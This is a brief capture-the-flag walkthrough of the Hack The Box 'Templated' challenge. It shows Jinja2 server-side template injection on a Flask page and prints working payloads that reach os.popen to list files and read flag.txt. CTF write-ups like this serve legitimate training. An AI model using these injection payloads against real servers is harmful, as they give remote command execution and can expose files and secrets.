Hack The Box — Templated Walkthrough

Hello, today I’ll talk about the solution of Hack The Box — Templated Challenge.

First of all, this is the page that meets us. I started doing research on Flask/Jinja2, and I found out that he was affected by SSTI.
To try this, I added {{7 * 7}} payload and saw it work.

And it worked, and we saw the reply.

SSTI with Jinja2 for more information;

https://www.onsecurity.io/blog/server-side-template-injection-with-jinja2/

Then I used this command to list files and I saw that it was flag.txt.

{{request.application.__globals__.__builtins__.__import__(‘os’).popen(‘ls -a’).read()}}

I got the flag reading the file.

{{request.application.__globals__.__builtins__.__import__(‘os’).popen(‘cat flag.txt’).read()}}

We find our flag and complete the challenge. Keep hacking !

Practice makes perfect :)